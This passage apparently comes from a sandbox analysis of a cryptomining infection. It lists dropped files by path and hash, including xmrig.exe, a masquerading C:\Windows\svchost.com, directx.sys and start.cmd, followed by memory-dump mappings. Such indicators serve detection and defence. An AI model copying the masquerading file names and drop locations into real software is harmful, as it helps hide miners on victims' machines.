                • C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE

                  MD5

                  63dc05e27a0b43bf25f151751b481b8c

                  SHA1

                  b20321483dac62bce0aa0cef1d193d247747e189

                  SHA256

                  7d607fb69c69a72a5bf4305599279f46318312ce1082b6a34ac9100b8c7762ce

                  SHA512

                  374d705704d456cc5f9f79b7f465f6ec7c775dc43001c840e9d6efbbdef20926ed1fa97f8a9b1e73161e17f72520b96c05fa58ac86b3945208b405f9166e7ba3

                • C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE

                  MD5

                  0d9146d70ac6a41ead1ea2d50d729508

                  SHA1

                  b9e6ff83a26aaf105640f5d5cdab213c989dc370

                  SHA256

                  0b876ddeefd88d5e98de7e409c5b6546ba8ffa195c168f9a4b6ba33b44d437ab

                  SHA512

                  c9394decfd469bfedd883095d604e11208aa290334ff5c0dce852f2ca74fba27c37ba2984dab8b27430e573681e22c9f903e53b01510a4b77d337cbd92c56cb3

                • C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE

                  MD5

                  07e194ce831b1846111eb6c8b176c86e

                  SHA1

                  b9c83ec3b0949cb661878fb1a8b43a073e15baf1

                  SHA256

                  d882f673ddf40a7ea6d89ce25e4ee55d94a5ef0b5403aa8d86656fd960d0e4ac

                  SHA512

                  55f9b6d3199aa60d836b6792ae55731236fb2a99c79ce8522e07e579c64eabb88fa413c02632deb87a361dd8490361aa1424beed2e01ba28be220f8c676a1bb5

                • C:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXE

                  MD5

                  fa982a173f9d3628c2b3ff62bd8a2f87

                  SHA1

                  2cfb18d542ae6b6cf5a1223f1a77defd9b91fa56

                  SHA256

                  bc5d80d05a1bd474cb5160782765bf973ba34ea25dedf7e96dfaf932b9935032

                  SHA512

                  95ca9066a2e5272494b8e234220b6028c14892679023ca70801475c38d341032363589375ec6ffc4cde3416dd88d0e3082d315f7beddccdf014122ddd0a90644

                • C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\VCREDI~1.EXE

                  MD5

                  0d9146d70ac6a41ead1ea2d50d729508

                  SHA1

                  b9e6ff83a26aaf105640f5d5cdab213c989dc370

                  SHA256

                  0b876ddeefd88d5e98de7e409c5b6546ba8ffa195c168f9a4b6ba33b44d437ab

                  SHA512

                  c9394decfd469bfedd883095d604e11208aa290334ff5c0dce852f2ca74fba27c37ba2984dab8b27430e573681e22c9f903e53b01510a4b77d337cbd92c56cb3

                • C:\Users\Admin\AppData\Local\MICROS~1\OneDrive\181510~1.001\FILECO~1.EXE

                  MD5

                  346d2ff654d6257364a7c32b1ec53c09

                  SHA1

                  224301c0f56a870f20383c45801ec16d01dc48d1

                  SHA256

                  a811042693bc2b31be7e3f454b12312f67bc97f2b15335a97e8d8f2ba0a6b255

                  SHA512

                  223545e3fc9f3cd66c5cbcb50dd7103743788f03a9db398da6dd2744ccaeee291f385ce4f2758d4504fc0f6b968fabbfe16ba03b5f546b743c51dacad7a049c3

                • C:\Users\Admin\AppData\Local\Temp\3582-490\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe

                  MD5

                  acecd9d2b3e52cb1b16d9287d0fda2af

                  SHA1

                  93063fcb0c0ef1f52ce55cd60f7e25a830ce6c3d

                  SHA256

                  0bb19116093aa69518b4d9ec3b064c772550ced132390b4fd67a5d1b98c3cd5b

                  SHA512

                  ab06e996aed4843a0c3e6cf5830c48596e21fa335e32cc7d6a23cc0d4098819c989ec9325bae445427e0ffd3a3894c06ea18808a15a32461cb733146fbd04750

                • C:\Users\Admin\AppData\Local\Temp\3582-490\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe

                  MD5

                  acecd9d2b3e52cb1b16d9287d0fda2af

                  SHA1

                  93063fcb0c0ef1f52ce55cd60f7e25a830ce6c3d

                  SHA256

                  0bb19116093aa69518b4d9ec3b064c772550ced132390b4fd67a5d1b98c3cd5b

                  SHA512

                  ab06e996aed4843a0c3e6cf5830c48596e21fa335e32cc7d6a23cc0d4098819c989ec9325bae445427e0ffd3a3894c06ea18808a15a32461cb733146fbd04750

                • C:\Users\Admin\AppData\Local\Temp\config.json

                  MD5

                  b4d5d77ee16ef922f44bab22041054b9

                  SHA1

                  4aca769d38ad4f0a5065ccc70eccc6a49470b299

                  SHA256

                  11cd5885c3d8096f2a56ed5217b2066aac83d8b7891aa916d96e039be19055e5

                  SHA512

                  6518890461d6201fe35529fa1d57ef7567f2cdcf34dc8af136eca2788dec48f2e2e32a8269653bac9179927256f6fd561e9a4453d4488e5e8d9bae796d9df110

                • C:\Users\Admin\AppData\Local\Temp\start.cmd

                  MD5

                  a6a75a12bf9fa181528834edb6c89cc1

                  SHA1

                  f45b174f2b7b5b68335ea182b5a296ad9df9bb0a

                  SHA256

                  fc00a6fbfc72dc81e6f530f7c64648162e7f3a6205b85f6dd754f05ab6e44987

                  SHA512

                  f6ff874f95da84edc94d37ef0ffbc9d46ac8f8d85a72f58dfbd738187b5e35f7cb64ef43e34a8b257348bcd382f8544f7de867561d2a7245db80511356c5d374

                • C:\Users\Admin\AppData\Local\Temp\start.exe

                  MD5

                  f28e459f5f13edd8ebfdbc2edaa44856

                  SHA1

                  05e33691400af1c43194afeb2d2583c5c24ca778

                  SHA256

                  c84455888da154185d14360f3f2e46e13120fae507dff69d5b556a29391b9e00

                  SHA512

                  4d15bfe4a965f72d8c2f5a16362c94a7186afc0070c8020e5e340641eab6ca038e8034cd7dc2c9c5911423c16968352ebcd2e3b1ac16ae35e3be5d7866231ae8

                • C:\Users\Admin\AppData\Local\Temp\start.exe

                  MD5

                  f28e459f5f13edd8ebfdbc2edaa44856

                  SHA1

                  05e33691400af1c43194afeb2d2583c5c24ca778

                  SHA256

                  c84455888da154185d14360f3f2e46e13120fae507dff69d5b556a29391b9e00

                  SHA512

                  4d15bfe4a965f72d8c2f5a16362c94a7186afc0070c8020e5e340641eab6ca038e8034cd7dc2c9c5911423c16968352ebcd2e3b1ac16ae35e3be5d7866231ae8

                • C:\Users\Admin\AppData\Local\Temp\tmp5023.tmp

                  MD5

                  b963cdae781b032ab6298e82209bee27

                  SHA1

                  487c860d2d16fd352d48cf7f91f45d7d58b4a739

                  SHA256

                  0a1a46f2a9e782213231316a6ea04d660e86df3dbbed87b42910be436ef7269c

                  SHA512

                  68b82d42bc549453fb5bcf8a8cb8410451c24455a1911deea3f44759678a37a3640567796f9199a0f1026350d23f44ed1ef34f0e6e40da9f56423d9642cbc2d8

                • C:\Users\Admin\AppData\Local\Temp\xmrig.exe

                  MD5

                  4c03f40035bf018553157080f1b02671

                  SHA1

                  86531b83d3b3317c9da5010357fd9b5fbfd2bebe

                  SHA256

                  d1d89ada2bd812473633d6aee4a4e1154affda7d0a5f8e3bf76638701b8c16f9

                  SHA512

                  9b20bd124fbce81e562f69c81903f54809ab10206b32b664b19862e8915093fe24a36b0095c3704fd89baca4a7f6fda01a8e3237b33be1efb82f5704080fa926

                • C:\Users\Admin\AppData\Local\Temp\xmrig.exe

                  MD5

                  4c03f40035bf018553157080f1b02671

                  SHA1

                  86531b83d3b3317c9da5010357fd9b5fbfd2bebe

                  SHA256

                  d1d89ada2bd812473633d6aee4a4e1154affda7d0a5f8e3bf76638701b8c16f9

                  SHA512

                  9b20bd124fbce81e562f69c81903f54809ab10206b32b664b19862e8915093fe24a36b0095c3704fd89baca4a7f6fda01a8e3237b33be1efb82f5704080fa926

                • C:\Users\Admin\AppData\Local\Temp\xmrig.exe

                  MD5

                  4c03f40035bf018553157080f1b02671

                  SHA1

                  86531b83d3b3317c9da5010357fd9b5fbfd2bebe

                  SHA256

                  d1d89ada2bd812473633d6aee4a4e1154affda7d0a5f8e3bf76638701b8c16f9

                  SHA512

                  9b20bd124fbce81e562f69c81903f54809ab10206b32b664b19862e8915093fe24a36b0095c3704fd89baca4a7f6fda01a8e3237b33be1efb82f5704080fa926

                • C:\Windows\directx.sys

                  MD5

                  7198a8ae4e4642ae87235be4754feaa1

                  SHA1

                  f10a1b68b823ad2c825d53bd3fc994ee329524f6

                  SHA256

                  f8ed320d625155c03c4ac1599e34a50c444c86d2eb07a9e616db2108b8ef4a52

                  SHA512

                  5cae151f6acae478a3083a60f138c38da5f0b3e9627bf5297ad2f0b9c24c2f806a4ca798ff3ef75e2288725e7cfe38e580f2e955f5bd33d927b7925ca06e03e2

                • C:\Windows\svchost.com

                  MD5

                  10a8af56e371107b2a0ca15575b08c91

                  SHA1

                  a28b59f09fb7cff94873b2a1499211c7885bfab7

                  SHA256

                  09258baa2057b4f26eb9de617c712a2605b5f58bdf9960d30753e4cda6573436

                  SHA512

                  7eeabb3789b466d1d15938b4f081d540d667d9c35f7790a1778220949110a1f818469691ca33e32a0ce0ceb59771293e8c952fec0d84db01850f1a05c5bd703d

                • C:\Windows\svchost.com

                  MD5

                  10a8af56e371107b2a0ca15575b08c91

                  SHA1

                  a28b59f09fb7cff94873b2a1499211c7885bfab7

                  SHA256

                  09258baa2057b4f26eb9de617c712a2605b5f58bdf9960d30753e4cda6573436

                  SHA512

                  7eeabb3789b466d1d15938b4f081d540d667d9c35f7790a1778220949110a1f818469691ca33e32a0ce0ceb59771293e8c952fec0d84db01850f1a05c5bd703d

                • C:\Windows\svchost.com

                  MD5

                  10a8af56e371107b2a0ca15575b08c91

                  SHA1

                  a28b59f09fb7cff94873b2a1499211c7885bfab7

                  SHA256

                  09258baa2057b4f26eb9de617c712a2605b5f58bdf9960d30753e4cda6573436

                  SHA512

                  7eeabb3789b466d1d15938b4f081d540d667d9c35f7790a1778220949110a1f818469691ca33e32a0ce0ceb59771293e8c952fec0d84db01850f1a05c5bd703d

                • C:\odt\OFFICE~1.EXE

                  MD5

                  02c3d242fe142b0eabec69211b34bc55

                  SHA1

                  ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

                  SHA256

                  2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

                  SHA512

                  0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

                • memory/1376-126-0x0000000000000000-mapping.dmp

                • memory/1916-128-0x0000000000000000-mapping.dmp

                • memory/3036-115-0x0000000000000000-mapping.dmp

                • memory/3172-122-0x0000000000000000-mapping.dmp

                • memory/3292-150-0x00000000001B0000-0x00000000001F0000-memory.dmp

                • memory/3292-168-0x0000000001030000-0x0000000001050000-memory.dmp

                • memory/3292-131-0x0000000000000000-mapping.dmp

                • memory/3292-167-0x0000000001010000-0x0000000001030000-memory.dmp

                • memory/3424-118-0x0000000000000000-mapping.dmp

                • memory/3500-132-0x0000000000000000-mapping.dmp

                • memory/3500-165-0x0000000001110000-0x0000000001130000-memory.dmp

                • memory/3500-166-0x0000000002DF0000-0x0000000002E10000-memory.dmp

                • memory/3500-135-0x0000000000180000-0x00000000001A0000-memory.dmp